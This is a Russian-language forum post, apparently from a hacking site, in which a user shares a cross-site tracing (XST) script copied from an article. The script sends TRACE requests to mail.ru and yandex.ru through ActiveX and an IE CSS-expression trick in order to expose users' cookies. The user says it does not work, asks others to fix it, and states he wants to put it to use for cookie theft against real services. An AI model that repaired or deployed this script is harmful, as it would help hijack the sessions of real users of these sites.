daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
недавно я просканил яндекс.ру Xspider`ом и увидел вот что:
возможен метод Trace можно выполнить межсайтинговый скриптинг".
я нашел про это статью у нас на сайте:http://www.xakep.ru/post/17540/default.asp. Там был следующий код скрипта, который выведет в всплывающем сообщении куки пользователя:
<script>
function xssDomainTraceRequest(){
var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
var exampleCode = xmlHttp;
xmlHttp.open ("TRACE","http://mail.ru",false);
xmlHttp.send ();
xmlDoc=xmlHttp.responseText;
alert (xmlDoc);
var target = "http://mail.ru";
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
var readyCode = 'font-size: expression(execScript(decodeURIComponent("' +
cExampleCode + '")))';
showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE="BUTTON" OnClick="xssDomainTraceRequest()" VALUE="Show Cookie
Information Using TRACE">
он не работает….я заменил mail.ru на yandex.ru но всё равно не работает…кажется ошибка в синтаксисе - посмотрите плиз.
очень бы хотелось скрипт доработать и в дело пустить:D
|
кража куков методом Trace - 
